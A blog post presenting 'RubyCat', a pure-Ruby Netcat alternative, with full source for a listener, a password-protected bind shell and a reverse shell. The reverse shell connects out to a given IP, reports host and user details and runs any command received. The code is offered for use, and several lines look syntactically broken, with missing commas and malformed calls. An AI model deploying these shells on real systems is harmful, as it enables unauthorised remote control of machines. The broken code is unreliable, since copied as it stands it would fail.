Labels
Posted by

RubyCat - A Pure Ruby NetCat Alternative

It's been a while and one of the last things I posted was about me off having fun with learning Ruby, so I thought I might share one of the more useful pieces of code I was able to come up with. I mashed up my reverse shell, my bind shell, and simple sockets connector and listener and came up with a simple to use script to simulate most of the basic or common tasks one might use Netcat for. As you know Netcat is often limited, flagged, or compiled without the -e GAPING_SECURITY_HOLE enabled which can make life hard on us as testers. This is one more thing you can add to the old bag of tricks to wiggle out of such situations if Ruby is available to you. It uses all standard libs so should work on any system with relatively recent ruby version installed, although I honestly have not widely tested it out yet so perhaps you can share your feedback with me to help improve a little. Some quick examples to highlight basic usage....

Open a listener on local machine using port 31337 and catch a reverse shell from somewhere:
COMMAND: ./rubycat.rb -l -p 31337


Connect to a Bind Shell you have waiting somewhere else:
COMMAND:  ./rubycat.rb -c -i 127.0.0.1 -p 5151


Launch a Bind Command Shell on localhost on port 31337 with password (default password is 'knock-knock'):
COMMAND: ./rubycat.rb -b -p 31337 -P s3cr3tp@ss


NOTE: If you enter the wrong pass, it will print funny message then go silent. You have to re-connect to try and login again.

Launch a Command Reverse Shell to provided IP and Port:
COMMAND: ./rubycat.rb -r -i 127.0.0.1 -p 31337

The 328 lines of Ruby which make it all possible: LINK


Data hosted with ♥ by Pastebin.com - Download Raw - See Original
  1. #!/usr/bin/env ruby
  2. #
  3. # RubyCat - A pure Ruby NetCat alternative
  4. # By: Hood3dRob1n
  5. #
  6.  
  7. require 'optparse'
  8.  
  9. trap("SIGINT") {puts "\n\nWARNING! CTRL+C Detected! Closing Socket Connection(s) and Shutting down....."exit 666;}
  10.  
  11. def banner
  12.   puts
  13.   puts "RubyCat - A pure Ruby NetCat alternative"
  14. end
  15.  
  16. def cls
  17.   if RUBY_PLATFORM =~ /win32|win64|\.NET|windows|cygwin|mingw32/i
  18.     system('cls')
  19.   else
  20.     system('clear')
  21.   end
  22. end
  23.  
  24. def randz
  25.   (0...1).map{ ('0'..'3').to_a[rand(4)] }.join
  26. end
  27.  
  28. class RubyCat
  29.   def initialize
  30.     require 'ostruct'
  31.     require 'socket'
  32.     require 'open3'
  33.   end
  34.  
  35.   # Simple NetCat Type Functionality
  36.   def listener(port=31337, ip=nil)
  37.     # It is all in how we define our socket
  38.     # Spawn a server or connect to one....
  39.     if ip.nil?
  40.       server = TCPServer.new(port)
  41.       server.listen(1)
  42.       @socket = server.accept
  43.     else
  44.       @socket = TCPSocket.open(ip, port)
  45.     end
  46.     # Actual  Socket Handling
  47.     while(true)
  48.       if(IO.select([],[],[@socket, STDIN],0))
  49.         socket.close
  50.         return
  51.       end
  52.       begin
  53.         while( (data = @socket.recv_nonblock(100)) != "")
  54.           STDOUT.write(data);
  55.         end
  56.         break
  57.       rescue Errno::EAGAIN
  58.       end
  59.       begin
  60.         while( (data = STDIN.read_nonblock(100)) != "")
  61.           @socket.write(data);
  62.         end
  63.         break
  64.       rescue Errno::EAGAIN
  65.       rescue EOFError
  66.         break
  67.       end
  68.       IO.select([@socket, STDIN][@socket, STDIN][@socket, STDIN])
  69.     end
  70.   end
  71.  
  72.   # Ruby Bind Command Shell
  73.   # Password Required to Access, default: knock-knock
  74.   # Send Password as first send when connecting or get rejected!
  75.   def bind_shell(port=31337, password='knock-knock')
  76.     # Messages for those who visit but don't have proper pass
  77.     @greetz=["Piss Off!""Grumble, Grumble......?""Run along now, nothing to see here.....""Who's There?"]
  78.  
  79.     # The number over loop is the port number the shell listens on.
  80.     Socket.tcp_server_loop("#{port}") do |socket, client_addrinfo|
  81.       command = socket.gets.chomp
  82.       if command.downcase == password
  83.         socket.puts "\nYou've Been Authenticated!\n"
  84.         socket.puts "This Bind connection brought to you by a little Ruby Magic xD\n"
  85.         socket.puts "Type 'EXIT' or 'QUIT' to exit shell & keep port listening..."
  86.         socket.puts "Type 'KILL' or 'CLOSE' to close listenr for good!\n\n"
  87.         socket.puts "Server Info: "
  88.         begin
  89.           if RUBY_PLATFORM =~/win32|win64|\.NET|windows|cygwin|mingw32/i
  90.             count=0
  91.             while count.to_i < 3
  92.               if count.to_i == 0
  93.                 command="echo Winblows"
  94.                 socket.print "BUILD: "
  95.               elsif count.to_i == 1
  96.                 command="whoami"
  97.                 socket.print "ID: "
  98.               elsif count.to_i == 2
  99.                 command="chdir"
  100.                 socket.print "PWD: "
  101.               end
  102.               count = count.to_i + 1
  103.               Open3.popen2e("#{command}") do | stdin, stdothers |
  104.                 IO.copy_stream(stdothers, socket)
  105.               end
  106.             end
  107.           else
  108.             count=0
  109.             while count.to_i < 3
  110.               if count.to_i == 0
  111.                 command="uname -a"
  112.                 socket.print "BUILD: \n"
  113.               elsif count.to_i == 1
  114.                 command="id"
  115.                 socket.print "ID: "
  116.               elsif count.to_i == 2
  117.                 command="pwd"
  118.                 socket.print "PWD: "
  119.               end
  120.               count = count.to_i + 1
  121.               Open3.popen2e("#{command}") do | stdin, stdothers |
  122.                 IO.copy_stream(stdothers, socket)
  123.               end
  124.             end
  125.           end
  126.           # Then we drop to sudo shell :)
  127.           while(true)
  128.             socket.print "\n(RubyCat)> "
  129.             command = socket.gets.chomp
  130.             if command.downcase == 'exit' or command.downcase =='quit'
  131.               socket.puts "\ngot r00t?\n\n"
  132.               break # Close Temporarily Since they asked nicely
  133.             end
  134.             if command.downcase == 'kill' or command.downcase =='close'
  135.               socket.puts "\ngot r00t?\n\n"
  136.               exit # Exit Completely when asked nicely :p
  137.             end
  138.             # Use open3 to execute commands as we read and write through socket connection
  139.             Open3.popen2e("#{command}") do | stdin, stdothers |
  140.               IO.copy_stream(stdothers, socket)
  141.             end
  142.           end
  143.           rescue
  144.             socket.write "Command or file not found!\n"
  145.             socket.write "Type EXIT or QUIT to close the session.\n"
  146.             socket.write "Type KILL or CLOSE to kill the shell completely.\n"
  147.             socket.write "\n\n"
  148.             retry
  149.           ensure
  150.             @cleared=0
  151.             socket.close
  152.           end
  153.         else
  154.           num=randz
  155.           socket.puts @greetz[num.to_i]
  156.         end
  157.  
  158.     end
  159.   end
  160.  
  161.   # Ruby Reverse Command Shell
  162.   def reverse_shell(ip='127.0.0.1', port=31337, retries='5')
  163.     while retries.to_i > 0
  164.       begin
  165.         socket = TCPSocket.new "#{ip}""#{port}"
  166.         break
  167.       rescue
  168.         # If we fail to connect, wait a few and try again
  169.         sleep 10
  170.         retries = retries.to_i - 1
  171.         retry
  172.       end
  173.     end
  174.     # Run commands with output sent to stdout and stderr
  175.     begin
  176.       socket.puts "This Reverse connection brought to you by a little Ruby Magic xD\n\n"
  177.       socket.puts "Server Info:"
  178.       # First we scrape some basic info....
  179.       if RUBY_PLATFORM =~/win32|win64|\.NET|windows|cygwin|mingw32/i
  180.         count=0
  181.         while count.to_i < 3
  182.           if count.to_i == 0
  183.             command="echo Winblows"
  184.             socket.print "BUILD: \n"
  185.           elsif count.to_i == 1
  186.             command="whoami"
  187.             socket.print "ID: "
  188.           elsif count.to_i == 2
  189.             command="chdir"
  190.             socket.print "PWD: "
  191.           end
  192.           count = count.to_i + 1
  193.           # Open3 to exec
  194.           Open3.popen2e("#{command}") do | stdin, stdothers |
  195.             IO.copy_stream(stdothers, socket)
  196.           end
  197.         end
  198.       else
  199.         count=0
  200.         while count.to_i < 3
  201.           if count.to_i == 0
  202.             command="uname -a"
  203.             socket.print "BUILD: \n"
  204.           elsif count.to_i == 1
  205.             command="id"
  206.             socket.print "ID: "
  207.           elsif count.to_i == 2
  208.             command="pwd"
  209.             socket.print "PWD: "
  210.           end
  211.           count = count.to_i + 1
  212.           # Oen3 to exec
  213.           Open3.popen2e("#{command}") do | stdin, stdothers |
  214.             IO.copy_stream(stdothers, socket)
  215.           end
  216.         end
  217.       end
  218.       # Now we drop to Pseudo shell :)
  219.       while(true)
  220.         socket.print "\n(RubyCat)> "
  221.         command = socket.gets.chomp
  222.         if command.downcase == 'exit' or command.downcase == 'quit'
  223.           socket.puts "\nOK, closing connection....\n"
  224.           socket.puts "\ngot r00t?\n\n"
  225.           break # Exit when asked nicely :p
  226.         end
  227.         # Open3 to exec
  228.         Open3.popen2e("#{command}") do | stdin, stdothers |
  229.           IO.copy_stream(stdothers, socket)
  230.         end
  231.       end
  232.     rescue
  233.       # If we fail for some reason, try again
  234.       retry
  235.     end
  236.   end
  237. end
  238.  
  239. # Main --
  240. options = {}
  241. optparse = OptionParser.new do |opts|
  242.   opts.banner = "Usage: #{$0} [OPTIONS]"
  243.   opts.separator ""
  244.   opts.separator "EX: #{$0} -l -p 31337"
  245.   opts.separator "EX: #{$0} -b -p 31337"
  246.   opts.separator "EX: #{$0} -b -p 31337 -P knock-knock"
  247.   opts.separator "EX: #{$0} -r -i 10.10.10.10 -p 31337"
  248.   opts.separator ""
  249.   opts.separator "Options: "
  250.   opts.on('-c''--connect'"\n\tSimple Connector") do |mode|
  251.     options[:method] = 0
  252.   end
  253.   opts.on('-l''--listen'"\n\tSetup Listener") do |mode|
  254.     options[:method] = 1
  255.   end
  256.   opts.on('-b''--bind'"\n\tSetup Bind Shell") do |mode|
  257.     options[:method] = 2
  258.   end
  259.   opts.on('-r''--reverse'"\n\tSetup Reverse Shell") do |mode|
  260.     options[:method] = 3
  261.   end
  262.   opts.on('-i''--ip IP'"\n\tIP for Reverse Shell Connection") do|ip|
  263.     options[:ip] = ip.chomp
  264.   end
  265.   opts.on('-p''--port PORT'"\n\tPort to Use for Connection") do|port|
  266.     options[:port] = port.to_i
  267.   end
  268.   opts.on('-P''--pass PASS'"\n\tPassword for Bind Shell") do|pass|
  269.     options[:pass] = pass
  270.   end
  271.   opts.on('-h''--help'"\n\tHelp Menu") do
  272.     cls
  273.     banner
  274.     puts
  275.     puts opts
  276.     puts
  277.     exit 69;
  278.   end
  279. end
  280. begin
  281.   foo = ARGV[0] || ARGV[0] = "-h"
  282.   optparse.parse!
  283.   if options[:method].to_i == 3 or options[:method].to_i == 0
  284.     mandatory = [:method,:port,:ip]
  285.   else
  286.     mandatory = [:method,:port]
  287.   end
  288.   missing = mandatory.select{ |param| options[param].nil}
  289.   if not missing.empty?
  290.     cls
  291.     banner
  292.     puts
  293.     puts "Missing options: #{missing.join(', ')}"
  294.     puts optparse
  295.     exit 666;
  296.   end
  297. rescue OptionParser::InvalidOptionOptionParser::MissingArgument
  298.   cls
  299.   banner
  300.   puts
  301.   puts $!.to_s
  302.   puts
  303.   puts optparse
  304.   puts
  305.   exit 666;  
  306. end
  307.  
  308. banner
  309. rc = RubyCat.new
  310. case options[:method].to_i
  311. when 0
  312.   puts "Trying to establish connection to #{options[:ip]} on port #{options[:port]}...."
  313.   rc.listener(options[:port].to_i, options[:ip])
  314. when 1
  315.   puts "Setting up Listener on port #{options[:port]}...."
  316.   rc.listener(options[:port].to_i)
  317. when 2
  318.   puts "Setting up Bind Shell on port #{options[:port]}...."
  319.   if options[:pass].nil?
  320.     rc.bind_shell(options[:port].to_i)
  321.   else
  322.     rc.bind_shell(options[:port].to_i, options[:pass].to_s)
  323.   end
  324. when 3
  325.   puts "Setting up Reverse Shell Connection to #{options[:ip]} on port #{options[:port]}...."
  326.   rc.reverse_shell(options[:ip], options[:port].to_i)
  327. end
  328. #EOF
Hope this is useful to someone out there....

Until next time, Enjoy!
Labels:

Comments

Post a Comment